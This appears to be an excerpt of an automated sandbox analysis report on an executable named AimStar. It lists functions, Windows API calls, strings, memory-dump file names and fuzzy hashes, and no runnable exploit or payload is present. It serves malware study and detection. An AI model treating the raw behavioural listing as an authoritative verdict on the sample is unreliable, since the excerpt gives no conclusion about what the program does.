Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction ID: 168e3f087d5738e38a1f486b50f276cbc320d983236d1f82efa22bcded6896cd
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: EB217432A0CBC196E3549F26A58076AB2A9FB84BD4F144135EB9D43F99CF7CD451CB04

Function 00007FF8A92D1DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A932F1C3

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction ID: 8f90084cb537eb21e4055f34e65ee0018805178edc69effb5439d96c7c90ebe3
Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction Fuzzy Hash: 0C21C631E0EBD2A5F7686E25A44127E22F4EF61BC4F64A130D90DC6696CE3CE841CA51

Function 00007FF710F5D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF710F50D00,?,?,?,00007FF710F5236A,?,?,?,?,?,00007FF710F53B59), ref: 00007FF710F5D6AA

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: cfa75f89eccb75faac08515a7a85bbc1b4cb79bb9df22fd3d2dcb95fef91f69e
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: B4F05E04B0FB0745FE647761581367892A84F557B0F884230DC2E453D2DE2CB58AC130

Non-executed Functions

Function 00007FF710F48BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48C46

Part of subcall function 00007FF710F5A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5A500

Part of subcall function 00007FF710F5878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F587F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48CD6
CreateProcessW.KERNEL32 ref: 00007FF710F48D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48D18

Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99

RegisterClassW.USER32 ref: 00007FF710F48D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48D7B
CreateWindowExW.USER32 ref: 00007FF710F48DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E05
PeekMessageW.USER32 ref: 00007FF710F48E29
TranslateMessage.USER32 ref: 00007FF710F48E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E41
PeekMessageW.USER32 ref: 00007FF710F48E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF710F49009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F49012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F4901F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF710F48D85
Failed to create child process!, xrefs: 00007FF710F48D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF710F48D44
CreateProcessW, xrefs: 00007FF710F48D27

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 5a1935e71967dfe1f238cb7eb0dda82a2f9294084112d9e6eda8353df3499aa7
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 51D17036A0CE8686E710AF74E8566ADB768FB84B68F800235DE5D437A5DF3CE149C710

Function 00007FF8A8814320 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A88148A4

Strings

%s mode not allowed: %s, xrefs: 00007FF8A881485E
mode, xrefs: 00007FF8A881467E
access, xrefs: 00007FF8A8814765
invalid uri authority: %.*s, xrefs: 00007FF8A88144A7
cache, xrefs: 00007FF8A881473B
mode, xrefs: 00007FF8A8814801
localhos, xrefs: 00007FF8A881447E
file, xrefs: 00007FF8A881439B
cach, xrefs: 00007FF8A8814820
no such vfs: %s, xrefs: 00007FF8A8814954
cach, xrefs: 00007FF8A881468F
no such %s mode: %s, xrefs: 00007FF8A88147CE

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
API String ID: 2830847230-1067337024
Opcode ID: 54f5ab21161c6cb124eb9694038dd95940b21175b17f0277af9e9f29b51a016e
Instruction ID: 0259365f6a6163c32e16240b9c5c688449f2e9fa83f2269e7c98b099168ef6a0
Opcode Fuzzy Hash: 54f5ab21161c6cb124eb9694038dd95940b21175b17f0277af9e9f29b51a016e
Instruction Fuzzy Hash: CF023462F2E28665FB758B2490503796BD2FB51FD8F1842B1CA6E436C1DF3DE8418328

Function 00007FF8A8153248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A8153264
00007FF8BFAC1A90.VCRUNTIME140 ref: 00007FF8A8153288
RtlCaptureContext.KERNEL32 ref: 00007FF8A8153291
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A81532AB
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A81532EC
00007FF8BFAC1A90.VCRUNTIME140 ref: 00007FF8A815331F
IsDebuggerPresent.KERNEL32 ref: 00007FF8A8153340
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A815335D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A8153368

Memory Dump Source

Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true

Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd

Similarity

API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3558122275-0
Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction ID: 337804030620217962a2059b4074fcc6bd9b6ed89e155c6af45f542859e1cabf
Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction Fuzzy Hash: AE313C7260AB819AEB658F60E8403EE7364FB85784F44503ADA4E47B98DF3CD648C724

Function 00007FF710F483B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4841B
RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4849E
DeleteFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484BD
FindNextFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484CB
FindClose.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484DC
RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484E5

Strings

%s\*, xrefs: 00007FF710F483E2

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: c8804d72b37f4fb3828078c608a66fd4d2ac8d57e5ae98e05546d570fe33ce39
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 28415C31A0CD4795EA60FB24E4569BDA368EB95764FC00232DA9D82794DF2CF54EC720

Function 00007FF8A8757336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF8A875759B
0123456789ABCDEF0123456789abcdef, xrefs: 00007FF8A8757526
-x0, xrefs: 00007FF8A8757606
VUUU, xrefs: 00007FF8A875746B

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
API String ID: 0-2031831958
Opcode ID: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
Instruction ID: bc4079ad152ce2e049c0f140b3ee446b431e1c87a900cf60fa5d2c8d97051634
Opcode Fuzzy Hash: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
Instruction Fuzzy Hash: 6BD13462B5E68296DB28CB24D194B7E6B95FB55BC0F4A6034DE4E43782DF3CE400C724

Function 00007FF710F4D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF710F4D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF710F4D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF710F4D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF710F4D240
IsDebuggerPresent.KERNEL32 ref: 00007FF710F4D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF710F4D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF710F4D2BC

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: d16efa32864ed7a321df98741386e48a9af5a9e4d417308362dc1b0aaf0c4c62
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: B3313076608E8586EB60AF60E8517EE73A4FB84758F44403ADA4D47B94EF38D548C720

Function 00007FF710F65C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F65CB5

Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C

Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

Part of subcall function 00007FF710F5A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A979
Part of subcall function 00007FF710F5A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A99E

_get_daylight.LIBCMT ref: 00007FF710F65CA4

Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C

_get_daylight.LIBCMT ref: 00007FF710F65F1A
_get_daylight.LIBCMT ref: 00007FF710F65F2B
_get_daylight.LIBCMT ref: 00007FF710F65F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 49e6d8236ff3031130ea1b969ef1b6e06bcf4b4d248ff8fe0acab26016519b7a
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: F7D1E22AA0CA0245EB20FF21D4461B9B769EF94BA4FC48136EA0D57796DF3CF449C760

Function 00007FF710F5A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF710F5A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF710F5A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF710F5A750
IsDebuggerPresent.KERNEL32 ref: 00007FF710F5A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF710F5A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF710F5A79E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: a269d102a8c2c3bed4aff0a0944e554530cbf553c41f8533f9e97c13446cabfc
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 3031943661CF8586D760DF25E8412AEB3A8FB88768F940135EA8D43B55EF3CE159CB10

Function 00007FF710F618E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F61930
FindFirstFileExW.KERNEL32 ref: 00007FF710F61A3A

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: 2790e1605a25fa21914b2ccafce8629b9dd7c71b1face50b81754119035eabb1
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 6FB1D72AB1CE9641EA60AB6194121BDE3A8FB85BF4F884131DE5D47BC5EE3CF449C310

Function 00007FF8A92D1EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A932CCF4

Strings

D:\a\1\s\include\internal/packet.h, xrefs: 00007FF8A932CAE9, 00007FF8A932CAFD
tls_parse_ctos_psk, xrefs: 00007FF8A932CE7A, 00007FF8A932CECD, 00007FF8A932CFFB, 00007FF8A932D0D6, 00007FF8A932D135
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A932CB37, 00007FF8A932CE86, 00007FF8A932CED4, 00007FF8A932D002, 00007FF8A932D0DD, 00007FF8A932D13C

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3535234312-3130753023
Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction ID: 38403eb35507a46a79ca23ed43ae98ceda017461534aa75f77ee44bc84c0b7bf
Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction Fuzzy Hash: 4B12B062A0EFD2A1F7509F61D4442BEB7A0EB91BC4F04A032DE5D87A9ADE7CE5418740

Function 00007FF710F65EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F65F1A

Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C

_get_daylight.LIBCMT ref: 00007FF710F65F2B

Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C

_get_daylight.LIBCMT ref: 00007FF710F65F3C

Part of subcall function 00007FF710F65638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6564C

Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
